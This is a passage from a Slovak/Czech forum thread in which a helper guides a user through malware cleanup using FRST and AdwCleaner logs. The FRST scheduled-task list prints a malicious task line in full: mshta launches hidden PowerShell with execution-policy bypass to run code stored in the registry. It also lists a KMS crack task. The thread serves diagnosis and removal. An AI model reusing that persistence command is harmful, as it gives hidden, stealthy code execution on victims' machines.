Description: The server {BF6C1E47-86EC-4194-9CE5-13C15DCB2001} did not register with DCOM within the required timeout.

Error: (10/21/2020 11:41:53 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID
{D63B10C5-BB46-4990-A94F-E40B9D520160}
and APPID
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Error: (10/21/2020 07:45:29 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Steam Client Service service failed to start due to the following error:
The service did not respond to the start or control request in a timely fashion.

Error: (10/21/2020 07:45:29 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Steam Client Service service to connect.


Windows Defender:
===================================
Date: 2020-10-18 17:42:29.074
Description:
Windows Defender scan has been stopped before completion.
Scan ID: {4FFA7FDF-9D80-4665-BA2E-77A22296DD1B}
Scan Type: Antimalware
Scan Parameters: Quick Scan

Date: 2020-10-17 23:07:35.332
Description:
Windows Defender scan has been stopped before completion.
Scan ID: {F5CF0A25-3F7F-4DFE-A2B7-CD922B8270D3}
Scan Type: Antimalware
Scan Parameters: Quick Scan

Date: 2020-10-17 20:22:25.412
Description:
Windows Defender scan has been stopped before completion.
Scan ID: {5AC52251-24F3-4360-9AA3-F0699B4C56D5}
Scan Type: Antimalware
Scan Parameters: Quick Scan

Date: 2020-10-17 15:38:54.119
Description:
Windows Defender scan has been stopped before completion.
Scan ID: {6367FC15-5410-4174-A9C4-4493178CD02C}
Scan Type: Antimalware
Scan Parameters: Quick Scan

Date: 2020-10-16 11:35:52.457
Description:
Windows Defender scan has been stopped before completion.
Scan ID: {D30BD636-C486-4F2F-BB7E-08A596807841}
Scan Type: Antimalware
Scan Parameters: Quick Scan

CodeIntegrity:
===================================

Date: 2020-10-22 20:18:44.800
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\OFFICE16\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2020-10-19 17:34:41.461
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\OFFICE16\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2020-10-17 20:21:46.429
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\OFFICE16\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2020-10-16 11:32:31.824
Description:
Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Common Files\microsoft shared\OFFICE16\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2020-10-10 11:17:25.481
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\OFFICE16\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2020-10-03 11:56:22.058
Description:
Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Common Files\microsoft shared\OFFICE16\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2020-09-25 10:31:30.946
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\OFFICE16\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2020-09-24 23:51:46.727
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\OFFICE16\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.

==================== Memory info ===========================

BIOS: American Megatrends Inc. F6 08/03/2013
Motherboard: Gigabyte Technology Co., Ltd. Z87-HD3
Processor: Intel(R) Core(TM) i7-4770K CPU @ 3.50GHz
Percentage of memory in use: 53%
Total physical RAM: 16271.11 MB
Available physical RAM: 7532.8 MB
Total Virtual: 32655.11 MB
Available Virtual: 21352 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:232.54 GB) (Free:49.06 GB) NTFS
Drive d: (Data) (Fixed) (Total:931.51 GB) (Free:365.51 GB) NTFS

\\?\Volume{eb0d191b-1087-11e6-8250-806e6f6e6963}\ (System Reserved) (Fixed) (Total:0.34 GB) (Free:0.06 GB) NTFS

==================== MBR & Partition Table ====================

==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 232.9 GB) (Disk ID: 92BC3579)
Partition 1: (Active) - (Size=350 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=232.5 GB) - (Type=07 NTFS)

==========================================================
Disk: 1 (MBR Code: Windows 7/8/10) (Size: 931.5 GB) (Disk ID: 28A9940F)
Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS)

==================== End of Addition.txt =======================

Uživatelský avatar
Diallix
Rádce
Rádce
Příspěvky: 2760
Registrován: 27 dub 2008 10:34
Kontaktovat uživatele:

Re: Prosim o preventivnu kontrolu

#2 Příspěvek od Diallix »

Dobry den.

Zubari su hrozna vec. Pab Boh pomahaj :]]

:arrow: Stiahnite si na plochu nastroj AdwCleaner, link. na stiahnutie tu: https://toolslib.net/downloads/finish/1/
Pred spustenim nastroja povypinajte vsetke beziace okna programov, to su vsetke beziace programy pod desktopom.
Kliknite pravym tlacidlom mysi na program -> spustit ako Administrator.
Pokracujte kliknutim na tlacidlo Prehladaj teraz (Scan now) a pockajte, kym sa system doskenuje.
Po skene nechajte oznacene vsetky chlieviky, pripadne najdene hrozieby a pokracujte v dolnom pravom rohu tlacidlom Vycistit Teraz (Clean and Repair).
Po restartovani PC sa spusti nastroj AdwCleaner, kliknite na Zobrazit soubor protokolu.
Spusti sa log, jeho obsah skopirujte sem.
Vyšla moja nová kniha BOTNETY! :173: Informácie o nej nájdete tu: >> BOTNETY <<

¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­
---
Obrázek Hľadáme nové posily do nášej CyberSecurity UNIT jednotky. Viac informácií o tom, čo to obnáša a ako sa pripojiť nájdete tu: >> CyberSecurity UNIT << Obrázek
----
Nízkoúrovňový, Vysokoúrovňový programátor - profilová karta tu: card <<
----
Háveťárna - UPLOAD Malwaru: >> upload <<
---
Ak sa Vám ľúbi moja práca a ste sňou spokojný, môžete ma kontaktovať na: diallix@centrum.sk, info@diallix.net alebo diallix@forum.viry.cz .
---
Momentálne aktívny ako:
- konzultant, vývojár a tutor výskumu inteligentného malwaru.
- tutor v oblasti dotazovacích jazykoch SQL (TSQL, PLSQL), objektového programovania (c++,c#,php) pre študentov.

Na fóre pôsobím ako:
- Bezpečnostná autorita viry.cz
- Zástupca tutora pre vzdelávanie nováčikov
- Zakladateľ Cyber Security jednotky

imicro
Návštěvník
Návštěvník
Příspěvky: 83
Registrován: 08 led 2008 16:28

Re: Prosim o preventivnu kontrolu

#3 Příspěvek od imicro »

# -------------------------------
# Malwarebytes AdwCleaner 8.0.8.0
# -------------------------------
# Build: 10-08-2020
# Database: 2020-09-29.1 (Cloud)
# Support: https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start: 10-23-2020
# Duration: 00:00:01
# OS: Windows 8.1 Pro
# Cleaned: 18
# Failed: 0


***** [ Services ] *****

No malicious services cleaned.

***** [ Folders ] *****

Deleted C:\ProgramData\IObit\Advanced SystemCare
Deleted C:\Users\Tomika\AppData\Local\DriverToolkit
Deleted C:\Users\Tomika\AppData\Roaming\IObit\Advanced SystemCare

***** [ Files ] *****

Deleted C:\END

***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

No malicious shortcuts cleaned.

***** [ Tasks ] *****

Deleted C:\Windows\System32\Tasks\DRIVER BOOSTER SCHEDULER

***** [ Registry ] *****

Deleted HKCU\Software\DriverToolkit
Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{240525CC-07E9-4C0E-BF92-7FD8CBC01AAC}
Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Driver Booster Scheduler
Deleted HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32|Codec Settings UAC Manager
Deleted HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Run|Codec Settings UAC Manager

***** [ Chromium (and derivatives) ] *****

No malicious Chromium entries cleaned.

***** [ Chromium URLs ] *****

Deleted banggood.com
Deleted banggood.com
Deleted banggood.com
Deleted banggood.com
Deleted banggood.com
Deleted http://feed.helperbar.com/?p=mKO_AwFzXI ... fAlJNtFeJI,
Deleted http://feed.helperbar.com/?p=mKO_AwFzXI ... fAlJNtFeJI,
Deleted metrolyrics.com

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries cleaned.

***** [ Firefox URLs ] *****

No malicious Firefox URLs cleaned.

***** [ Hosts File Entries ] *****

No malicious hosts file entries cleaned.

***** [ Preinstalled Software ] *****

No Preinstalled Software cleaned.


*************************

[+] Delete Tracing Keys
[+] Reset Winsock

*************************

AdwCleaner[S00].txt - [3008 octets] - [23/10/2020 17:47:50]

########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C00].txt ##########

Uživatelský avatar
Diallix
Rádce
Rádce
Příspěvky: 2760
Registrován: 27 dub 2008 10:34
Kontaktovat uživatele:

Re: Prosim o preventivnu kontrolu

#4 Příspěvek od Diallix »

Poprosim o nove logy FRST + ADDITION
Vyšla moja nová kniha BOTNETY! :173: Informácie o nej nájdete tu: >> BOTNETY <<

¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­
---
Obrázek Hľadáme nové posily do nášej CyberSecurity UNIT jednotky. Viac informácií o tom, čo to obnáša a ako sa pripojiť nájdete tu: >> CyberSecurity UNIT << Obrázek
----
Nízkoúrovňový, Vysokoúrovňový programátor - profilová karta tu: card <<
----
Háveťárna - UPLOAD Malwaru: >> upload <<
---
Ak sa Vám ľúbi moja práca a ste sňou spokojný, môžete ma kontaktovať na: diallix@centrum.sk, info@diallix.net alebo diallix@forum.viry.cz .
---
Momentálne aktívny ako:
- konzultant, vývojár a tutor výskumu inteligentného malwaru.
- tutor v oblasti dotazovacích jazykoch SQL (TSQL, PLSQL), objektového programovania (c++,c#,php) pre študentov.

Na fóre pôsobím ako:
- Bezpečnostná autorita viry.cz
- Zástupca tutora pre vzdelávanie nováčikov
- Zakladateľ Cyber Security jednotky

imicro
Návštěvník
Návštěvník
Příspěvky: 83
Registrován: 08 led 2008 16:28

Re: Prosim o preventivnu kontrolu

#5 Příspěvek od imicro »

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 24-10-2020
Ran by Tomika (administrator) on TOM (Gigabyte Technology Co., Ltd. Z87-HD3) (24-10-2020 19:59:32)
Running from C:\Users\Tomika\Desktop
Loaded Profiles: Tomika
Platform: Windows 8.1 Pro (Update) (X64) Language: English (United Kingdom)
Default browser: Chrome
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/33 ... scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(A FOUR TECH CO., LTD. -> ) C:\Program Files (x86)\Bloody7\Bloody7\Bloody7.exe
(Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe
(Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
(Adobe Systems Incorporated -> Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
(Adobe Systems, Incorporated -> Adobe Systems Inc.) D:\Programy\Adobe\Acrobat\Acrobat\acrotray.exe
(Adobe Systems, Incorporated -> Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(Autodesk, Inc -> Autodesk Inc.) C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AdAppMgrSvc.exe
(Cole Williams Software Limited -> ) C:\Windows\SysWOW64\Codecs\TrayMenu.exe
(CrypKey (Canada) Ltd.) [File not signed] C:\Windows\System32\Crypserv.exe
(Epic Games Inc. -> Epic Games, Inc.) D:\Programy\Epic Games\Launcher\Engine\Binaries\Win64\UnrealCEFSubProcess.exe
(Epic Games Inc. -> Epic Games, Inc.) D:\Programy\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe
(Even Balance, Inc. -> ) C:\Windows\SysWOW64\PnkBstrA.exe
(Intel(R) pGFX -> ) C:\Windows\System32\igfxTray.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\igfxHK.exe
(Manhattan Engineering Incorporated -> Kite) C:\Program Files\Kite\kited.exe
(Manhattan Engineering Incorporated -> Kite) C:\Program Files\Kite\KiteService.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\slui.exe <2>
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\SppExtComObj.Exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_6.3.9600.19750_none_fa39f32f9b2d0928\TiWorker.exe
(NVIDIA Corporation -> Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe <2>
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe <2>
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvspcaps64.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvsphelper64.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Oxygen Cloud Inc. -> ) C:\Users\Tomika\.odrive\bin\6729\odriveapp.exe
(Oxygen Cloud Inc. -> odrive) C:\Users\Tomika\.odrive\bin\6729\odrive.exe
(Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Samsung Electronics Co., Ltd. -> Samsung Electronics Co. Ltd.) C:\Program Files (x86)\Samsung\Samsung Magician\SamsungMagician.exe
(TeamViewer Germany GmbH -> TeamViewer Germany GmbH) D:\Programy\TeamViewer\TeamViewer_Service.exe
(Wacom Technology Corp. -> Wacom Technology) C:\Program Files\Tablet\Wacom\WacomHost.exe
(Wacom Technology Corporation -> Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\Wacom_Tablet.exe
(Wacom Technology Corporation -> Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\Wacom_TabletUser.exe
(Wacom Technology Corporation -> Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\Wacom_TouchUser.exe
(Wacom Technology Corporation -> Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\WTabletServicePro.exe
(Wondershare software CO., LIMITED -> Wondershare) C:\Program Files (x86)\Wondershare\WAF\2.4.2.222\WsAppService.exe

==================== Registry (Whitelisted) ===================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [509936 2018-04-11] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM\...\Run: [ShadowPlay] => C:\Windows\system32\nvspcap64.dll [1893496 2017-05-03] (NVIDIA Corporation -> NVIDIA Corporation)
HKLM\...\Run: [AdobeGCInvoker-1.0] => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3402832 2020-09-23] (Adobe Inc. -> Adobe Systems, Incorporated)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [18391120 2019-03-31] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM\...\Run: [WindowsDefender] => "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
HKLM-x32\...\Run: [SwitchBoard] => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Test Signing Certificate -> Adobe Systems Incorporated) [File not signed]
HKLM-x32\...\Run: [AdobeCS6ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe [1073312 2012-03-09] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM-x32\...\Run: [ADSKAppManager] => C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AutodeskDesktopApp.exe [711616 2016-04-19] (Autodesk, Inc -> Autodesk, Inc.)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Acrobat Assistant 8.0] => D:\Programy\Adobe\Acrobat\Acrobat\Acrotray.exe [3499896 2014-05-08] (Adobe Systems, Incorporated -> Adobe Systems Inc.)
HKLM-x32\...\Run: [Adobe Creative Cloud] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2383040 2016-10-12] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [653728 2018-03-26] (Oracle America, Inc. -> Oracle Corporation)
HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\Run: [AdobeBridge] => [X]
HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\Run: [GalaxyClient] => [X]
HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\Run: [EpicGamesLauncher] => D:\Programy\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe [32546704 2020-10-23] (Epic Games Inc. -> Epic Games, Inc.)
HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\Run: [Skype for Desktop] => C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe [91701608 2020-07-30] (Skype Software Sarl -> Skype Technologies S.A.)
HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\Run: [Bloody2] => C:\Program Files (x86)\Bloody7\Bloody7\Bloody7.exe [19841264 2020-02-13] (A FOUR TECH CO., LTD. -> )
HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\Run: [Kite] => C:\Program Files\Kite\kited.exe [562159168 2020-10-22] (Manhattan Engineering Incorporated -> Kite)
HKLM\...\Print\Monitors\Adobe PDF Port Monitor: C:\Windows\system32\AdobePDF.dll [55432 2012-09-23] (Adobe Systems, Incorporated -> Adobe Systems Inc)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe [2020-10-21] (Google LLC -> Google LLC)
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> "C:\Program Files (x86)\Google\Chrome\Application\57.0.2987.133\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\CodecPackTrayMenu.lnk [2018-06-11]
ShortcutTarget: CodecPackTrayMenu.lnk -> C:\Windows\SysWOW64\Codecs\TrayMenu.exe (Cole Williams Software Limited -> )
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\odrive.lnk [2017-07-27]
ShortcutTarget: odrive.lnk -> C:\Program Files\odrive\odrive.exe (Oxygen Cloud, Inc -> ) [File not signed]
GroupPolicy: Restriction - Chrome <==== ATTENTION
HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) ============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0291BC3E-5758-4AE0-B583-887997C4F7E5} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [154440 2016-05-02] (Google Inc -> Google Inc.)
Task: {08667DDA-529A-4AE5-B93A-F3FB2AFB6863} - System32\Tasks\npcapwatchdog => C:\Program Files\Npcap\CheckStatus.bat [862 2019-04-30] () [File not signed]
Task: {14E9279D-E202-421D-9345-9FF6FF65892A} - System32\Tasks\AutoKMS => D:\Programy\MS Office\KMS_tooltip_crack\AutoKMS.exe
Task: {19B48E07-EF07-43C1-89F3-DC0C7BE14F95} - System32\Tasks\CCleanerSkipUAC => D:\Programy\CCleaner\CCleaner.exe [26588344 2020-09-08] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {2AE7DBC0-9D7B-4633-9F38-EA13D59FFC97} - \Movie\Movie task -> No File <==== ATTENTION
Task: {2C5BAA6C-22CE-4023-8CD3-920F648F948D} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [436856 2017-05-03] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {3B6DA161-FF75-4709-9698-E8B4D4E29F7A} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {521E2DEE-AF47-458B-BE39-05E41D7000C3} - System32\Tasks\SamsungMagician => C:\Program Files (x86)\Samsung\Samsung Magician\SamsungMagician.exe [1112576 2017-05-19] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co. Ltd.)
Task: {56E7C739-D87C-4968-A298-0FA8DD870A67} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {57E8FD86-D77A-4957-AF8A-185FF714EF38} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [495224 2017-05-03] (NVIDIA Corporation -> NVIDIA Corporation) -> -d "C:\Program Files\NVIDIA Corporation\NvDriverUpdateCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerDriverUpdateCheck.log
Task: {5DFEF0DB-1EC0-4858-9DE9-295F0928B552} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1195544 2018-12-16] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
Task: {5FBDD006-E7EF-4EB4-B15F-E75C13219037} - System32\Tasks\SystemSettings => mshta vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -WindowStyle hidden -ep bypass -nop -c $e=(Get-ItemProperty HKLM:\Software\WOW6432Node\a);Select-Object -ExpandProperty Shell;Invoke-Expression $e",0,True)(window.close)
Task: {67CAE894-9940-43DF-A154-A01C69C48B7F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [154440 2016-05-02] (Google Inc -> Google Inc.)
Task: {69904E5D-AA09-4F07-8269-73B550B28214} - System32\Tasks\JavaUpdateSched => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [653728 2018-03-26] (Oracle America, Inc. -> Oracle Corporation)
Task: {7354C34F-FF87-4E86-89AB-F2B6844E5835} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [1693816 2017-05-03] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {8116AA3D-F35E-4EE1-A65F-61E452CB28B9} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_445_pepper.exe [1497656 2020-10-13] (Adobe Inc. -> Adobe)
Task: {8623AE83-BCCD-4DB0-BE84-45A87C9A0D5E} - System32\Tasks\CCleaner Update => D:\Programy\CCleaner\CCUpdate.exe [686384 2020-09-08] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {AF11B0C8-2370-4BF1-A148-2AC2A2B5F4A3} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [649336 2017-05-03] (NVIDIA Corporation -> NVIDIA Corporation)
